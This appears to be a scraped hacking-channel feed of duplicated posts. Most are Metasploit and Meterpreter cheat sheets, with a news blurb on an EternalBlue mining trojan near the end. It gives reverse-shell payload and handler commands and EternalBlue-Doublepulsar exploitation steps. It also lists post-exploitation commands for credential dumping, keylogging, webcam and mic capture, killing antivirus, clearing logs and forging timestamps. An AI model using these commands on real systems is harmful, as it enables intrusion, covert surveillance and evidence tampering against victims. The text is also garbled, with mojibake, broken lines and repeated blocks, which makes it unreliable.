msfvenom -p osx/x86/shellreversetcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers
Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
Once the required values are completed the following command will execute your handler โ โmsfconsole -L -r โ
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMETASPLOIT
#FastTips
Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
Start metasploit
Show the basic information for a module
Run the module
Show all hosts discovered in the MSF database
https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
multi/handler to accept an incoming reverse_https_meterpreter
Building Your Own MSF Module
Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
-
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMETASPLOIT
#FastTips
Search for exploits using Metasploit GitHub framework source code:
*https://github.com/rapid7/metasploit-framework*
Translate them for use on OSCP LAB or EXAM.
Metasploit
MetaSploit requires Postfresql
systemctl start postgresql
To enable Postgresql on startupsystemctl enable postgresql
MSF SyntaxStart metasploit
msfconsole
msfconsole -q
Show help for commandshow -h
Show Auxiliary modulesshow auxiliary
Use a moduleuse auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_passShow the basic information for a module
info
Show the configuration parameters for a moduleshow options
Set options for a moduleset RHOSTS 192.168.1.1-254
set THREADS 10Run the module
run
Execute an Exploitexploit
Search for a modulesearch type:auxiliary login
Metasploit Database AccessShow all hosts discovered in the MSF database
hosts
Scan for hosts and store them in the MSF databasedb_nmap
Search machines for specific ports in MSF databaseservices -p 443
Leverage MSF database to scan SMB ports (auto-completed rhosts)services -p 443 --rhosts
You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video:https://www.youtube.com/watch?v=4OHLor9VaRI
1. First step is to configure the Kali to work with wine 32bit
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit2. Download the exploit repostory
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
4. Start metasploit console (spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.)
use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
RHOST => 10.11.1.73
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
PROCESSINJECT => spoolsv.exe
msf exploit(eternalblue_doublepulsar) > run####Experimenting with Meterpreter####
Get system information from Meterpreter Shell
sysinfo
Get user id from Meterpreter Shellgetuid
Search for a filesearch -f *pass*.txt
Upload a fileupload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec
Download a filedownload c:\\Windows\\system32\\calc.exe /tmp/calc.exe
Invoke a command shell from Meterpreter Shellshell
Exit the meterpreter shellexit
Metasploit Exploit Multi Handlermulti/handler to accept an incoming reverse_https_meterpreter
payload
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST $ip
set LPORT 443
exploit
[*] Started HTTPS reverse handler on https://$ip:443/Building Your Own MSF Module
mkdir -p ~/.msf4/modules/exploits/linux/misc
cd ~/.msf4/modules/exploits/linux/misc
cp
/usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
./crossfire.rb
nano crossfire.rbPost Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
-
download Download a file or directoryupload Upload a file or directoryportfwd Forward a local port to a remote serviceroute View and modify the routing tablekeyscan_start Start capturing keystrokeskeyscan_stop Stop capturing keystrokesscreenshot Grab a screenshot of the interactive desktoprecord_mic Record audio from the default microphone for X secondswebcam_snap Take a snapshot from the specified webcamgetsystem Attempt to elevate your privilege to that of local system.hashdump Dumps the contents of the SAM databaseโ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
GitHub
GitHub - rapid7/metasploit-framework: Metasploit Framework
Metasploit Framework. Contribute to rapid7/metasploit-framework development by creating an account on GitHub.
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMaterpreter Study Notes
# Baisc system commands
background # placed in the background of the current session
Sessions # Sessions to see -h help
sessions -i <ID value> # kill -k session into the session
bgrun / RUN # implementation of the existing module, double-click the tab enter the run, has been listed Some scripts
info # View existing module information
getuid # View current user identity
getprivs # View current user permissions
getpid # Get current process ID (PID)
sysinfo # View target machine system information
irb # Open ruby terminal
ps # View is running Process
kill <PID value> # Kill the specified PID process
idletime # View target idle time
reboot / shutdown # Restart / Shutdown
shell # Enter target cmd shell
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆMaterpreter Study Notes
# Baisc system commands
background # placed in the background of the current session
Sessions # Sessions to see -h help
sessions -i <ID value> # kill -k session into the session
bgrun / RUN # implementation of the existing module, double-click the tab enter the run, has been listed Some scripts
info # View existing module information
getuid # View current user identity
getprivs # View current user permissions
getpid # Get current process ID (PID)
sysinfo # View target machine system information
irb # Open ruby terminal
ps # View is running Process
kill <PID value> # Kill the specified PID process
idletime # View target idle time
reboot / shutdown # Restart / Shutdown
shell # Enter target cmd shell
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Bypassing Application Whitelisting By Using dnx.exe.pdf
226.5 KB
The Most requested hacking tutorial :
Bypassing Application Whitelisting By Using dnx.exe
Bypassing Application Whitelisting By Using dnx.exe
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHelpful Commands for any hacker:
# Uictl switch keyboard / mouse
Uictl [ enable/disable ] [ keyboard/mouse/all ] # enable or disable keyboard/mouse
uictl disable mouse # disable mouse
uictl disable keyboard # disable keyboard
# Execute executable file
the Execute # executable file on the target machine
execute -H -i -f cmd.exe create a new process cmd.exe #, -H invisible, -i interactive
execute -H -m -d notepad.exe -f payload.exe - a "-o hack.txt"
# -d Process name displayed during execution of the target host (for masquerading) -m Direct execution from memory
"-o hack.txt" is the running parameter of payload.exe
# Migrate process migration
Getpid # Get the current process's pid
ps # View the current active process
migrate <pid value> # Migrate the Meterpreter session to the specified pid value in the process
kill <pid value> #kill the process
# Clearav clear log
Clearav # Clear application logs, system logs, security logs in windows
# Timestomp forged timestamp
Timestomp C: \\ -h
View help timestomp -v C: \\ 2 .txt
View timestamp timestomp C: \\ 2 .txt -f C: \\ 1 .txt #Copy the timestamp of 1.txt Give
2. txt timestomp c: \\ test \\ 22 .txt -z "03/10/2019 11:55:55" -v # Set the four properties to uniform time
# Portfwd port forwarding
Portfwd add -l 1111 -p 3389 -r 127 .0.0.1 #Forward the 3389 port of the target machine to the local port 1111
rdesktop 127 .0.0.1:1111 # Need to enter the username and password to connect
rdesktop -u Administrator -p 123 127 .0.0.1:1111 # -u username -p password
# Autoroute add route
run autoroute -h # View help
run get_local_subnets # View target intranet segment address
run autoroute -s 192 .168.183.0/24 # Add target network segment route
run autoroute -p # View added route
run post/windows/gather/arp_scanner RHOSTS = 192 .168.183.0/24
run auxiliary/scanner/portscan/tcp RHOSTS = 192 .168.183.146 PORTS = 3389
# Socks agent
Reference: https://www.freebuf.com/articles/network/125278.html
use auxiliary/server/socks4a
set srvhost 127 .0.0.1
set srvport 2000
run
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆHelpful Commands for any hacker:
# Uictl switch keyboard / mouse
Uictl [ enable/disable ] [ keyboard/mouse/all ] # enable or disable keyboard/mouse
uictl disable mouse # disable mouse
uictl disable keyboard # disable keyboard
# Execute executable file
the Execute # executable file on the target machine
execute -H -i -f cmd.exe create a new process cmd.exe #, -H invisible, -i interactive
execute -H -m -d notepad.exe -f payload.exe - a "-o hack.txt"
# -d Process name displayed during execution of the target host (for masquerading) -m Direct execution from memory
"-o hack.txt" is the running parameter of payload.exe
# Migrate process migration
Getpid # Get the current process's pid
ps # View the current active process
migrate <pid value> # Migrate the Meterpreter session to the specified pid value in the process
kill <pid value> #kill the process
# Clearav clear log
Clearav # Clear application logs, system logs, security logs in windows
# Timestomp forged timestamp
Timestomp C: \\ -h
View help timestomp -v C: \\ 2 .txt
View timestamp timestomp C: \\ 2 .txt -f C: \\ 1 .txt #Copy the timestamp of 1.txt Give
2. txt timestomp c: \\ test \\ 22 .txt -z "03/10/2019 11:55:55" -v # Set the four properties to uniform time
# Portfwd port forwarding
Portfwd add -l 1111 -p 3389 -r 127 .0.0.1 #Forward the 3389 port of the target machine to the local port 1111
rdesktop 127 .0.0.1:1111 # Need to enter the username and password to connect
rdesktop -u Administrator -p 123 127 .0.0.1:1111 # -u username -p password
# Autoroute add route
run autoroute -h # View help
run get_local_subnets # View target intranet segment address
run autoroute -s 192 .168.183.0/24 # Add target network segment route
run autoroute -p # View added route
run post/windows/gather/arp_scanner RHOSTS = 192 .168.183.0/24
run auxiliary/scanner/portscan/tcp RHOSTS = 192 .168.183.146 PORTS = 3389
# Socks agent
Reference: https://www.freebuf.com/articles/network/125278.html
use auxiliary/server/socks4a
set srvhost 127 .0.0.1
set srvport 2000
run
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
Freebuf
ๅพ่งฃMeterpreterๅฎ็ฐ็ฝ็ป็ฉฟ้็ๆนๆณ - FreeBuf็ฝ็ปๅฎๅ
จ่กไธ้จๆท
ๆฌๆๆไปฌๅฐ้่ฟ็คบไพๅๆๆปๅป่
ๆฏๅฆไฝ่ฟ็จๅ็งๆนๆณ่ฟ่ก็ฝ็ป็ฉฟ้็ใ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ# Common script :
Run arpscanner -r 192 .168.183.1/24 # Use arp for surviving host scan
run winenum # automate some detection scripts
run credcollect # get user hash
run domainlistgen # get domain management account list
run post/multi/gather/env # get User environment variable
run post/windows/gather/enumloggedonusers -c # List current login user
run post/linux/gather/checkvm # virtual machine
run post/windows/gather/checkvm # virtual machine
run post/windows/gather/ Forensics/enumdrives # View memory information
run post/windows/gather/enumapplications # Get installation
software information
run post/windows/gather/dumplinks # Get recently accessed documents, link information
run post/windows/gather/enumie # Get IE cache
run post/windows/gather/enumfirefox # Get firefox cache
run post/windows/gather/enumchrome # Get Chrome cache
run post/multi/recon/localexploitsuggester # Get local privilege vulnerability
run post/windows/gather/enumpatches # Get patch information
run post/windows/gather/enumdomain # Find domain control
run post/windows/gather/enumsnmp # Get snmp community name
run post/windows/gather/credentials/vnc # Get vnc password
run post/windows/wlan/ Wlanprofile # Used to read the target host WiFi password
run post/multi/gather/wlangeolocate # Based on wlan, the location confirmation file is located at /root/.msf4/loot
run post/windows/manage/killav close antivirus software
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ# Common script :
Run arpscanner -r 192 .168.183.1/24 # Use arp for surviving host scan
run winenum # automate some detection scripts
run credcollect # get user hash
run domainlistgen # get domain management account list
run post/multi/gather/env # get User environment variable
run post/windows/gather/enumloggedonusers -c # List current login user
run post/linux/gather/checkvm # virtual machine
run post/windows/gather/checkvm # virtual machine
run post/windows/gather/ Forensics/enumdrives # View memory information
run post/windows/gather/enumapplications # Get installation
software information
run post/windows/gather/dumplinks # Get recently accessed documents, link information
run post/windows/gather/enumie # Get IE cache
run post/windows/gather/enumfirefox # Get firefox cache
run post/windows/gather/enumchrome # Get Chrome cache
run post/multi/recon/localexploitsuggester # Get local privilege vulnerability
run post/windows/gather/enumpatches # Get patch information
run post/windows/gather/enumdomain # Find domain control
run post/windows/gather/enumsnmp # Get snmp community name
run post/windows/gather/credentials/vnc # Get vnc password
run post/windows/wlan/ Wlanprofile # Used to read the target host WiFi password
run post/multi/gather/wlangeolocate # Based on wlan, the location confirmation file is located at /root/.msf4/loot
run post/windows/manage/killav close antivirus software
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCrack-Sniffer-Keylogger-webcam modules :
# Common crack module
Auxiliary/scanner/mssql/mssqllogin
Auxiliary/scanner/ftp/ftplogin
Auxiliary/scanner/ssh/sshlogin
Auxiliary/scanner/telnet/telnetlogin
Auxiliary/scanner/smb/smblogin
Auxiliary/scanner/mssql/mssqllogin
Auxiliary/scanner/mysql/mysqllogin
Auxiliary/scanner/oracle/oraclelogin
Auxiliary/scanner/postgres/postgreslogin
Auxiliary/scanner/vnc/vnclogin
Auxiliary/scanner/pcanywhere/pcanywherelogin
Auxiliary/scanner/snmp/snmplogin
Auxiliary/scanner/ftp/anonymous
# Keylogger
Keyscanstart # Start key record
keyscandump # Export record data
keyscanstop # End key record
# Sniffer capture package
Use sniffer
Snifferinterfaces # View NIC
snifferstart 1 # Select NIC 1 to start capturing
snifferstats 1 # View NIC 1 status
snifferdump 1 /tmp/wlan1.pcap # Export pcap packet
snifferstop 1 # Stop NIC 1 capture
snifferrelease 1 # Release NIC 1 traffic
# Webcam
recordmic # audio recording
webcamchat # open a video chat (the other party pop)
webcamlist # view camera
webcamsnap # through the camera to take pictures
webcamstream # open by video surveillance cameras (to monitor โ live as a web page)
# Screen capture
Screenshot # Screenshots
use espia # Use espia module
screengrab # screenshot
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆCrack-Sniffer-Keylogger-webcam modules :
# Common crack module
Auxiliary/scanner/mssql/mssqllogin
Auxiliary/scanner/ftp/ftplogin
Auxiliary/scanner/ssh/sshlogin
Auxiliary/scanner/telnet/telnetlogin
Auxiliary/scanner/smb/smblogin
Auxiliary/scanner/mssql/mssqllogin
Auxiliary/scanner/mysql/mysqllogin
Auxiliary/scanner/oracle/oraclelogin
Auxiliary/scanner/postgres/postgreslogin
Auxiliary/scanner/vnc/vnclogin
Auxiliary/scanner/pcanywhere/pcanywherelogin
Auxiliary/scanner/snmp/snmplogin
Auxiliary/scanner/ftp/anonymous
# Keylogger
Keyscanstart # Start key record
keyscandump # Export record data
keyscanstop # End key record
# Sniffer capture package
Use sniffer
Snifferinterfaces # View NIC
snifferstart 1 # Select NIC 1 to start capturing
snifferstats 1 # View NIC 1 status
snifferdump 1 /tmp/wlan1.pcap # Export pcap packet
snifferstop 1 # Stop NIC 1 capture
snifferrelease 1 # Release NIC 1 traffic
# Webcam
recordmic # audio recording
webcamchat # open a video chat (the other party pop)
webcamlist # view camera
webcamsnap # through the camera to take pictures
webcamstream # open by video surveillance cameras (to monitor โ live as a web page)
# Screen capture
Screenshot # Screenshots
use espia # Use espia module
screengrab # screenshot
ENJOYโค๏ธ๐๐ป
โ git sources
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆThe latest variant of the eternal blue downloader restarts the EXE file attack, and the new variant has infected 15,000 servers :
> A new variant of the eternal blue downloader Trojan. This variant uses Python to package EXE executable files for attacks. The organization used a similar method at the end of 2018. Tencent security big data monitoring data shows that the latest variant of the eternal blue downloader quickly spread after it appeared. It has infected about 15,000 servers. The poisoning system is finally used to download and run the Monero mining Trojan.
> In the process of continuous evolution and update, the eternal blue downloader Trojan has gradually switched the EXE attack mode to use Powershell scripts to achieve fileless attacks. After its functions became more and more huge, the gang of gangsters again added the code of exploiting the eternal blue vulnerability attack and mssql blasting attack to the EXE Trojan, and shielded the relevant code in Powershell.
> The system trapped by this variant attack will download if.bin, download and run an EXE attack module named by a random string for large-scale vulnerability scanning and attack propagation, and will also download the Monero coin mining Trojan to occupy a large amount of CPU resources on the server Mining will cause severe productivity losses to the injured enterprises.
enjoyโค๏ธ๐๐ป
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆThe latest variant of the eternal blue downloader restarts the EXE file attack, and the new variant has infected 15,000 servers :
> A new variant of the eternal blue downloader Trojan. This variant uses Python to package EXE executable files for attacks. The organization used a similar method at the end of 2018. Tencent security big data monitoring data shows that the latest variant of the eternal blue downloader quickly spread after it appeared. It has infected about 15,000 servers. The poisoning system is finally used to download and run the Monero mining Trojan.
> In the process of continuous evolution and update, the eternal blue downloader Trojan has gradually switched the EXE attack mode to use Powershell scripts to achieve fileless attacks. After its functions became more and more huge, the gang of gangsters again added the code of exploiting the eternal blue vulnerability attack and mssql blasting attack to the EXE Trojan, and shielded the relevant code in Powershell.
> The system trapped by this variant attack will download if.bin, download and run an EXE attack module named by a random string for large-scale vulnerability scanning and attack propagation, and will also download the Monero coin mining Trojan to occupy a large amount of CPU resources on the server Mining will cause severe productivity losses to the injured enterprises.
enjoyโค๏ธ๐๐ป
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
โ โ โ U๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆBest Boot - Repair access to operating systems
GRUB reinstall, MBR restore, UEFI, SecureBoot, RAID, LVM, Wubi, filesystem repair... :
Download : https://sourceforge.net/p/boot-repair/home
#FastTips
GRUB reinstall, MBR restore, UEFI, SecureBoot, RAID, LVM, Wubi, filesystem repair... :
Download : https://sourceforge.net/p/boot-repair/home
#FastTips